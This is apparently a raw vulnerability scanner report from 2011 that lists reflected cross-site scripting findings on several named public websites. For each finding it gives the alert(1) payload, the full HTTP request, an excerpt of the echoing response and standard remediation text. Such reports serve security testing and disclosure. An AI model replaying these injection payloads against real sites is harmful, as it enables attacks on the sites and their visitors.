GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:47:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index-radar.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 64616 Content-Type: text/html Cache-Control: public Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea202</script><script>alert(1)</script>53080030620 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /maps-satellite.asp HTTP/1.1 Host: www.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Length: 64040 Content-Type: text/html Cache-Control: public Date: Thu, 03 Feb 2011 16:35:14 GMT Connection: close Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/ Set-Cookie: aco=dbg=0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 35111
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:07 GMT Connection: close Content-Length: 35109
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "e2434";alert(1)//40b9502e47"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:17 GMT Connection: close Content-Length: 30482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:16 GMT Connection: close Content-Length: 30482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "bcd6c";alert(1)//f1f27091f7b"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:13 GMT Connection: close Content-Length: 29547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "25f3f";alert(1)//41fc69da3be"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:13 GMT Connection: close Content-Length: 29547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:14 GMT Connection: close Content-Length: 33335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:14 GMT Connection: close Content-Length: 33335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "1947f";alert(1)//760c35e1ead"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 1.0 X-AspNet-Version: 2.0.50727 Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 16:36:16 GMT Connection: close Content-Length: 31563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1 Host: www.experts123.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa
Response
